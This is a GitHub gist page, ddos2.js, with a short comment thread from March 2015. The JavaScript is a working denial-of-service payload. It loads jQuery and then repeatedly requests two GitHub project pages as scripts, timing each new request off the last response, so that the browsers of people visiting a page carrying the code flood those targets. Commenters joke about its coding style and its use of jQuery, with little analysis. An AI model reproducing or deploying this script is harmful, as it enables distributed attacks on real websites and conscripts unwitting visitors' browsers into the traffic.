Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
ddos2.js
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
var a = new Date;
return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
var a = unixtime() % NUM;
get(url_array[a])
}
function get(a) {
var b;
$.ajax({
url: a,
dataType: "script",
timeout: 1E4,
cache: !0,
beforeSend: function() {
requestTime = (new Date).getTime()
},
complete: function() {
responseTime = (new Date).getTime();
b = Math.floor(responseTime - requestTime);
3E5 > responseTime - startime && (r_send(b), count += 1)
}
})
}
function r_send(a) {
setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
@makevoid

This comment has been minimized.

Copy link

@makevoid makevoid commented Mar 27, 2015

It doesn't make sense why they're doing it

also this doesn't make sense, why:

(new Date).getTime()

vs

new Date().getTime()`

lol

@ysangkok

This comment has been minimized.

Copy link

@ysangkok ysangkok commented Mar 27, 2015

@makevoid, this is the output of the beautifier which was run on minified code. It's hard to know what they originally wrote since the two snippets are semantically identical AFAIK.

@rpominov

This comment has been minimized.

Copy link

@rpominov rpominov commented Mar 27, 2015

They are using jQuery lazy bastards :)

@phuicy

This comment has been minimized.

Copy link

@phuicy phuicy commented Mar 27, 2015

Does this allow for github's alert("WARNING: malicious javascript detected on this domain") to flow back?

Game: Is there better warning they could put?

@jariz

This comment has been minimized.

Copy link

@jariz jariz commented Mar 27, 2015

@phuicy yea because they use 'script' as type(?)
From jQuery docs:

"script": Evaluates the response as JavaScript and returns it as plain text.

http://api.jquery.com/jQuery.ajax/

@phuicy

This comment has been minimized.

Copy link

@phuicy phuicy commented Mar 27, 2015

So my game is even more fun then.

@drewwells

This comment has been minimized.

Copy link

@drewwells drewwells commented Mar 27, 2015

Can't write simple AJAX without jQuery, Pass on hiring.

@canhnm

This comment has been minimized.

Copy link

@canhnm canhnm commented Mar 28, 2015

lol too long proccess of loading additional the heavy lib jQuery instead of native Javascript

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment